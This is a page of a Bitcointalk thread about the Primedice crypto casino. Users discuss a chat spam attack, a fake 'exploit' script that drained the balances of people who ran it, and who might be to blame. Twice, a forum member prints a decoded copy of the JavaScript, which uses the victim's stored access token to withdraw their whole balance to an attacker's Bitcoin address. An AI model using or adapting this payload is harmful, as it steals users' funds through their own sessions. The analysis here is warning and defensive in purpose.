Primedice.com | Since 2013 | Longest Running Crypto Casino | 113 BTC Jackpot! - page 1199.

MICRO

legendary

Activity: 2464

Merit: 1037

CEO @ Stake.com and Primedice.com

Quote from: Stunna on September 21, 2014, 06:17:45 AM

Quote from: DiamondCardz on September 21, 2014, 03:45:35 AM

Quote from: ?? on ??

Quote from: Anony on September 20, 2014, 11:21:42 PM

Quote from: ?? on ??

Quote from: StopGG on September 20, 2014, 11:16:20 PM

What is the Mute command? ill start to mute this guy

1. You have to a mod to mute
2. There are tens or hundreds of accounts with different combos posting

There is no way to stop this guy unless chat is turned off, he's most likely also using proxy lists on each acct so I personally don't think he'll be stopped anytime soon.

Plus it seems he has disabled mute command for mods, can't mute anyone at all at the moment.

Put this in my original post...This is DEFINITELY MDMA

Prove it.

Until you prove it you have no basis to make accusations like this. "He is good at coding" is not proof. I'm good at coding, does that mean I am now the person who stole everyone's BTC? I don't know if anything happened to mdma that I'm not aware of (i.e. he was demoted from Mod or something like that), but until I know the situation, I have to call you out there.

Yeah there's really no proof it was mdma so not much I can do. The code is arguably similar but couldn't someone have just edited his code and replaced it with malicious content?

MDMA was rly in some tough situation lately that's why he wasn't online much. But that doesn't mean he tried to scam.
I contacted him on skype but still didn't get any reply .

Until there is a good proof that was him, i wouldn't make any accusations.

DiamondCardz

legendary

Activity: 1134

Merit: 1118

I do have to say:

Quote from: ?? on ??

Also lost a fair few coins and I KNOW who is responsible for this, it's MDMA.

Why do I think it is MDMA? He's the only one with the coding language and this sort of knowledge about PD to create something like this. You can compare the script to his old PD2 bot and you'll see that the two are very similar. He is a smart guy, and he's committed a smart crime. HE IS RESPONSIBLE. If anyone wants the copy of his PD2 bot to compare I'm going to put it on paste bin as well as the malicious script to compare.

You know that MDMA is responsible because he has coding skills and that he coded a PD2 bot?

Meh. I'm sorry but you want to be a mod, yet you throw around frivolous accusations like this. It's bad etiquette. If you're going to accuse someone of doing something like this you need cold hard evidence rather than opinions and assumptions.

And why would you run some JS which claims to be an exploit? I do not have sympathy for you if you ran a program which claimed to be an exploit for PD, sorry. You could have at least skimmed over the code. (I heard that it was in source code form rather than executable)

And here is the JS that it gave you (DO NOT RUN THIS IN YOUR CONSOLE, LOOKING AT THE CODE DOES NOTHING BUT IF YOU RUN THIS IT'S YOUR OWN FAULT): http://pastie.org/9577897

Honestly, just skimming over the code and the fact he (or she) tried to hide it should set off alarm bells.

Stunna

legendary

Activity: 3192

Merit: 1279

Primedice.com, Stake.com

Quote from: DiamondCardz on September 21, 2014, 03:45:35 AM

Quote from: ?? on ??

Quote from: Anony on September 20, 2014, 11:21:42 PM

Quote from: ?? on ??

Quote from: StopGG on September 20, 2014, 11:16:20 PM

What is the Mute command? ill start to mute this guy

1. You have to a mod to mute
2. There are tens or hundreds of accounts with different combos posting

There is no way to stop this guy unless chat is turned off, he's most likely also using proxy lists on each acct so I personally don't think he'll be stopped anytime soon.

Plus it seems he has disabled mute command for mods, can't mute anyone at all at the moment.

Put this in my original post...This is DEFINITELY MDMA

Prove it.

Until you prove it you have no basis to make accusations like this. "He is good at coding" is not proof. I'm good at coding, does that mean I am now the person who stole everyone's BTC? I don't know if anything happened to mdma that I'm not aware of (i.e. he was demoted from Mod or something like that), but until I know the situation, I have to call you out there.

Yeah there's really no proof it was mdma so not much I can do. The code is arguably similar but couldn't someone have just edited his code and replaced it with malicious content?

Also thanks dooglus for decoding the malicious code.

WhatTheGox

legendary

Activity: 812

Merit: 1000

Im in UK timezone if that helps?

MICRO

legendary

Activity: 2464

Merit: 1037

CEO @ Stake.com and Primedice.com

Wow, shit , what i missed !

We need some mods for that timezone.

As from now , i will leave my skype on online and volume on max so people who have me on skype can wake me up when shit like this happens so i can try to stop the spam.

B4RF

hero member

Activity: 813

Merit: 507

Quote from: ranochigo on September 21, 2014, 04:05:35 AM

Quote from: snarlpill on September 21, 2014, 03:57:27 AM

Kind of random, but 2 thoughts/comments-

@Stunna- Have you ever thought about doing "No Confirm" deposits, aka instant deposits, but just have to have at least 1 confirm before withdrawing?

And could anybody let me know how to sign up for the website owner 20% referral boost? I have sent an email or 2, no luck so far, but if there are stipulations could you please send them to support(@)cryptoplanet.co ? 86 referrals so far, but no whales yet- barely even tuna fish Wink

Instant deposits might not happen. People can deposit money then bet, if lost, double spend it immediately. If win, confirm it. This way, they can still withdraw the winning money. People can easily go to another account if they get banned due to double spending. This was what happened last time and PD lost some money because of this.

And with the tipping function they can tip the money to another account and double spend it.

Might not be the best idea to implement this.

ranochigo

legendary

Activity: 3038

Merit: 4418

Crypto Swap Exchange

Quote from: snarlpill on September 21, 2014, 03:57:27 AM

Kind of random, but 2 thoughts/comments-

@Stunna- Have you ever thought about doing "No Confirm" deposits, aka instant deposits, but just have to have at least 1 confirm before withdrawing?

And could anybody let me know how to sign up for the website owner 20% referral boost? I have sent an email or 2, no luck so far, but if there are stipulations could you please send them to support(@)cryptoplanet.co ? 86 referrals so far, but no whales yet- barely even tuna fish Wink

Instant deposits might not happen. People can deposit money then bet, if lost, double spend it immediately. If win, confirm it. This way, they can still withdraw the winning money. People can easily go to another account if they get banned due to double spending. This was what happened last time and PD lost some money because of this.

snarlpill

hero member

Activity: 910

Merit: 530

$5 24k Gold FREE 4 sign-up! Mene.com/invite/h5ZRRP

Kind of random, but 2 thoughts/comments-

@Stunna- Have you ever thought about doing "No Confirm" deposits, aka instant deposits, but just have to have at least 1 confirm before withdrawing?

And could anybody let me know how to sign up for the website owner 20% referral boost? I have sent an email or 2, no luck so far, but if there are stipulations could you please send them to support(@)cryptoplanet.co ? 86 referrals so far, but no whales yet- barely even tuna fish Wink

DiamondCardz

legendary

Activity: 1134

Merit: 1118

Quote from: ?? on ??

Quote from: Anony on September 20, 2014, 11:21:42 PM

Quote from: ?? on ??

Quote from: StopGG on September 20, 2014, 11:16:20 PM

What is the Mute command? ill start to mute this guy

1. You have to a mod to mute
2. There are tens or hundreds of accounts with different combos posting

There is no way to stop this guy unless chat is turned off, he's most likely also using proxy lists on each acct so I personally don't think he'll be stopped anytime soon.

Plus it seems he has disabled mute command for mods, can't mute anyone at all at the moment.

Put this in my original post...This is DEFINITELY MDMA

Prove it.

Until you prove it you have no basis to make accusations like this. "He is good at coding" is not proof. I'm good at coding, does that mean I am now the person who stole everyone's BTC? I don't know if anything happened to mdma that I'm not aware of (i.e. he was demoted from Mod or something like that), but until I know the situation, I have to call you out there.

WhatTheGox

legendary

Activity: 812

Merit: 1000

Quote from: waterpile on September 21, 2014, 01:02:26 AM

don't click links that are suspicious or untrusted

+1
dont ever click strange links, sometimes its tricky though i fell for one once at BTC-e which was cleverly disguised to mimic a bitcointalk.org link.

Anony

sr. member

Activity: 308

Merit: 250

Invest & Earn: https://cloudthink.io

Quote from: dooglus on September 21, 2014, 01:30:44 AM

Quote from: Ejaculation on September 20, 2014, 10:40:02 PM

Wtf I just tried it and .4 BTC disappeared out of my accoun?

I tried decoding the 'exploit'.

I got this far:

Code:

calculate_nonce = function(seed) {
  return 'https://api.primedice.com/api/' + seed + '?access_token=' + localStorage['token'];
};

lut = window['$'];

lut['getJSON'](
  calculate_nonce('users/1'), function(seed) {
    var key1 = 'amount'
    var key2 = 'address'
    var load = {};
    load[key1] = seed['user']['balance'];
    load[key2] = '1UKZqhqW9QfNjEaSBTMqZhX4TWoHG51ju';
    lut['post'](calculate_nonce('withdraw'), load);
  }
);

I guess it's using the API to get your balance and withdraw it to address 1UKZqhqW9QfNjEaSBTMqZhX4TWoHG51ju.

Probably best not to run it...

Edit:

Quote from: Ejaculation on September 20, 2014, 10:40:02 PM

Wtf I just tried it and .4 BTC disappeared out of my accoun?

If you check the address your balance gets send to, you'll see the total haul is only 0.03 BTC. It doesn't look like anyone lost 0.4 BTC from their accoun unless you ran a different version of the hack with a different destination address.

there were actually 2 different scripts being posted, one withdrawing to the address you mentioned above, and the other to 19Nft7skg4RdH7P43XYcCSYRzZwQiTy6PE which collected ~0.3btc

dooglus

legendary

Activity: 2940

Merit: 1333

Quote from: Ejaculation on September 20, 2014, 10:40:02 PM

Wtf I just tried it and .4 BTC disappeared out of my accoun?

I tried decoding the 'exploit'.

I got this far:

Code:

calculate_nonce = function(seed) {
  return 'https://api.primedice.com/api/' + seed + '?access_token=' + localStorage['token'];
};

lut = window['$'];

lut['getJSON'](
  calculate_nonce('users/1'), function(seed) {
    var key1 = 'amount'
    var key2 = 'address'
    var load = {};
    load[key1] = seed['user']['balance'];
    load[key2] = '1UKZqhqW9QfNjEaSBTMqZhX4TWoHG51ju';
    lut['post'](calculate_nonce('withdraw'), load);
  }
);

I guess it's using the API to get your balance and withdraw it to address 1UKZqhqW9QfNjEaSBTMqZhX4TWoHG51ju.

Probably best not to run it...

Edit:

Quote from: Ejaculation on September 20, 2014, 10:40:02 PM

Wtf I just tried it and .4 BTC disappeared out of my accoun?

If you check the address your balance gets send to, you'll see the total haul is only 0.03 BTC. It doesn't look like anyone lost 0.4 BTC from their accoun unless you ran a different version of the hack with a different destination address.

waterpile

hero member

Activity: 602

Merit: 500

Its his fault for falling such cheap tricks, don't click links that are suspicious or untrusted

Anony

sr. member

Activity: 308

Merit: 250

Invest & Earn: https://cloudthink.io

Quote from: ?? on ??

Quote from: Anony on September 21, 2014, 12:22:56 AM

Quote from: ?? on ??

Quote from: Stunna on September 21, 2014, 12:13:43 AM

Set some restrictions on chat, obviously don't run untrusted code in your browser.

Take a look at my post it's clear who it is. Are you going to investigate the issue or end it at leaving restrictions?
I lost coins on my alt but not going to ask for any compensation since It was my own fault hit I want to see justice done to the culprit

both scripts were wrote in java, other than that there is no clear similarities in the two. How are you so certain it was mdma anyway?
And yes, losing your balance was your fault for trying to abuse an exploit. Even if you wanted to recover your losses, doubt Stunna would pay back someone who was trying to scam him in the first place.

I did not plan on exploiting I planned on reporting it if it worked, in fact, it didn't. I knew it wouldn't as it isn't possible for something like this to be made.
Have a look closely at both bots, also how did this user get access to the API to do what he did, only staff have access as far as I am concerned?

Also someone please decrypt the address in the malicious code and post it, I'll analyse where this money is going to

Come ask him, he's in chat right now explaining how he did everything. Pretty interesting.

Anony

sr. member

Activity: 308

Merit: 250

Invest & Earn: https://cloudthink.io

Quote from: ?? on ??

Quote from: Stunna on September 21, 2014, 12:13:43 AM

Set some restrictions on chat, obviously don't run untrusted code in your browser.

Take a look at my post it's clear who it is. Are you going to investigate the issue or end it at leaving restrictions?
I lost coins on my alt but not going to ask for any compensation since It was my own fault hit I want to see justice done to the culprit

both scripts were wrote in java, other than that there is no clear similarities in the two. How are you so certain it was mdma anyway?
And yes, losing your balance was your fault for trying to abuse an exploit. Even if you wanted to recover your losses, doubt Stunna would pay back someone who was trying to scam him in the first place.

Stunna

legendary

Activity: 3192

Merit: 1279

Primedice.com, Stake.com

Set some restrictions on chat, obviously don't run untrusted code in your browser.

nahtnam

legendary

Activity: 1092

Merit: 1000

nahtnam.com

Dont use code you cant read.

Brah

newbie

Activity: 42

Merit: 0

Lol, Like I said in Chat a few days ago, if you're stupid enough to try any script/bot you deserve whatever happens.

michietn94

legendary

Activity: 1274

Merit: 1001

what is the purpose he's doing that ?
For leveling up ? or just want to disturb PD chat ?

Hope nothing will loss after the incident
and can be fix, ASAP

AmazingMonkey265

newbie

Activity: 6

Merit: 0

This is messed some is being a total meanie!! Oh well I guess you guys will be busy for awhile. Its pretty messed up you cant mute atm.

Topic: Primedice.com | Since 2013 | Longest Running Crypto Casino | 113 BTC Jackpot! - page 1199. (Read 1989907 times)